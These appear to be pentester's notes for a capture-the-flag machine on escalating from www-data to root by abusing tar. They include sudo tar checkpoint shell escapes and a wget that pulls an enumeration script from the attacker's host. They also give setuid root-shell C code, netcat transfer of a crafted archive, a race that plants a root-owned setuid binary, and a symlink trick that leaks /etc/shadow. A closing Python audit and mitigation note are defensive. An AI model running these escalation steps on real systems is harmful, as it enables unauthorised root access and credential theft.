TAR backups
Easy PrivEsc
> whoami
www-data
> sudo -l
(sally) NOPASSWD: /bin/tar
> sudo -u sally tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
> sudo -u sally tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
> whoami
sally
Backup Script Vulnerability
If root runs anything as a scheduled job, you can attempt to redirect what that job operates on
Copy the script back to your host and decompose it for analysis
Examples of root running TAR:
Extracting a TAR as root
Same idea as NFS Root Squashing; similar to "NFS Root Squashing" and the "jail" box
Make a setuid binary that is root-owned
gzip/tar the setuid binary (ownership is stored in the archive)
Copy it back and inject it into the 'temp' folder the script is about to check
Root extracts the archive into 'check'
and the extracted files come out root-owned, since root believes they belong to him!
REF: NFSRootSquash
Backup Script Discovery
Enum to find the backup/script/job running
Works just fine as 'user'
cd /tmp
wget http://$MyIP:5555/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh
pspy32 ..get more details
locate backuperer ..investigate
Backup Flaw Scenario
Backup script runs TAR as Root every 5 minutes
Deletes the previous checks: /var/tmp/.* and /var/tmp/check.
Creates a gzip archive of the directory /var/www/html with user permissions (tar runs as the unprivileged user)
Saves it in the file /var/tmp/.randomsha1
Sleeps for 30 seconds.
Creates the directory /var/tmp/check
Extracts the gzip /var/tmp/.randomsha1 as root into /var/tmp/check
If /var/www/html is different from backup: /var/tmp/check/var/www/html
Report error.
Otherwise, move file /var/tmp/.randomsha1 to /var/backups/onuma-wwww-dev.bak
And delete 'check' directory and .randomsha1
Backup Flaw Exploit #1
The script is designed to tar as the user, then untar as root
Then it compares against the previous version (the loop gives us a 5 minute window)
We can inject our evil tar into that window:
The script will tar/copy/extract/compare .. and fail with an error ..
leaving the root-extracted files in place for 5 minutes
Create the evil setuid
----------------------------
gcc ..installed?
locate -r gcc$
kali:
uname -a ..we have 32bit (should match target)
cp /opt/shells/setuid.c .
----------------------------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Only yields root when the binary is root-owned with the setuid bit set. */
int main(int argc, char *argv[])
{
    char *const sh_argv[] = { "sh", NULL };   /* argv[0] must not be NULL on most systems */

    setreuid(0, 0);                           /* make real and effective uid root */
    execve("/bin/sh", sh_argv, NULL);         /* replace this process with a root shell */
    return 1;                                 /* only reached if execve fails */
}
----------------------------
#include <unistd.h>

/* Variant using setuid() and execl(); same effect, spawns bash as root. */
int main(void)
{
    setuid(0);                                  /* real + effective uid to root (setuid bit needed) */
    execl("/bin/bash", "bash", (char *)NULL);   /* argv[0] = "bash", no further args */
    return 0;
}
----------------------------
gcc
apt search gcc-multilib
Compile
gcc -m32 -o setuid setuid.c ..32 bit compile
TAR the evil suid
TAR stores the uid/gid of the file owner in each entry's header inside the archive
If we create the file as root and TAR it, a root extraction restores root ownership (and keeps the suid bit)
----------------------------
kali:
sudo -i ..do this work as root
mkdir -p var/www/html ..mock directory
cp suid var/www/html
chmod 6555 var/www/html/suid ..set the suid bit
chmod u+s var/www/html/suid ..alternate
ls -la var/www/html/
tar -zcvf setuid.tar.gz var/ ..mock tar
send:
nc -nlvp 9002 < setuid.tar.gz
-----------------------
target:
> cd /var/tmp
> nc $MyIP 9002 > setuid.tar.gz
> watch -n 1 'systemctl list-timers'
created '.6683a76af11' ..temp extract
> cp setuid.tar.gz .6683a76af11 ..INJECTED !!!
> watch -n 1 'systemctl list-timers'
root extracts '.6683a76af11' to the 'check' folder
untar and diffs as 'root'
> cd check/var/www/html
> ls -la
rsuid owned by root and suid-bit-set !!
> ./rsuid
> whoami
root !
Backup Flaw Exploit #2
The diff runs as root
and its output is written to a readable error file:
/var/backups/onuma_backup_test.txt
tar an evil symlink that root will extract/diff
cd /var/tmp/var/www/html
ln -s /etc/shadow index.html ..symlink
ln -s /root/root.txt index.html ..alternate
cat index.html ..denied
cd /var/tmp
tar -zcvf symlink.tar.gz var/ ..mock tar
watch -n 1 'systemctl list-timers'
created '.17f6c199' ..temp extract
> cp symlink.tar.gz .17f6c199 ..swap our evil-tar-sym
job will untar and diff as 'root'
> cat /var/backups/onuma_backup_error.txt
the contents of 'shadow' appear in the diff output !
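As an added defender-side check (not part of the original notes), here is a Python audit that inspects an archive the way a hardened backup job should before extracting it as root: it flags members not owned by the expected unprivileged uid, members carrying setuid/setgid bits, and links or paths that leave the extraction tree. The archive contents, member names and uid 33 are constructed for this example.

```python
import io
import stat
import tarfile

WEB_UID = 33  # constructed: uid/gid the backup job is expected to run tar as (www-data on Debian)

def build_sample_archive():
    """Constructed sample mimicking the backup: one normal file, one root-owned
    setuid binary and one symlink pointing outside the extracted tree."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        page = tarfile.TarInfo("var/www/html/index.html")
        page.size, page.mode, page.uid, page.gid = 5, 0o644, WEB_UID, WEB_UID
        tf.addfile(page, io.BytesIO(b"hello"))
        suid = tarfile.TarInfo("var/www/html/suid")
        suid.mode, suid.uid, suid.gid = 0o6555, 0, 0      # setuid+setgid, owned by root
        tf.addfile(suid, io.BytesIO(b""))
        link = tarfile.TarInfo("var/www/html/index.html.bak")
        link.type, link.linkname = tarfile.SYMTYPE, "/etc/shadow"
        link.uid = link.gid = WEB_UID
        tf.addfile(link)
    return buf.getvalue()

def _escapes(path):
    """True for absolute paths or any '..' component (would leave the extract dir)."""
    return path.startswith("/") or ".." in path.split("/")

def audit_archive(data, expect_uid):
    """Return (member, reason) findings; an empty list means safe to extract as root."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tf:
        for m in tf.getmembers():
            if _escapes(m.name):
                findings.append((m.name, "path escapes extraction root"))
            if m.uid != expect_uid or m.gid != expect_uid:
                findings.append((m.name, f"owner uid={m.uid} gid={m.gid}, expected {expect_uid}"))
            if m.mode & (stat.S_ISUID | stat.S_ISGID):
                findings.append((m.name, "setuid/setgid bit set"))
            if (m.issym() or m.islnk()) and _escapes(m.linkname):
                findings.append((m.name, f"link target {m.linkname} leaves the tree"))
    return findings

if __name__ == "__main__":
    for name, why in audit_archive(build_sample_archive(), WEB_UID):
        print(f"REFUSE {name}: {why}")
```

The simpler fix for a job like this one is to extract as the unprivileged user, or with GNU tar's --no-same-owner --no-same-permissions so ownership and suid bits stored in the archive are never restored.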
REF
tartarHTB